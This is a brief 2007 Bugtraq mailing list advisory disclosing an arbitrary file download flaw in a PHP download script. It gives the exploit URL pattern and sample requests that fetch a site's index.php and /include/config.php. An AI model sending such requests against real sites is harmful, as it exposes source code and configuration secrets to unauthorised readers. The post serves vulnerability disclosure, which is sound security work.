Bugtraq mailing list archives

[Vulz] eLouai's Download Script Remote File Download Vulnerability


From: pete.houston.17187 () gmail com
Date: 23 Oct 2007 17:03:48 -0000

Software : eLuisa's Download Script
Bug found by : Xcross87

Xploit : http://victim.com/downloadfile.php?file=file_path

Sample :
http://victim.com/downloadfile.php?file=index.php
http://victim.com/downloadfile.php?file=/include/config.php

=== Xcross87 | HCETeam Xploiter | HCEGroup.Vn ===


Current thread: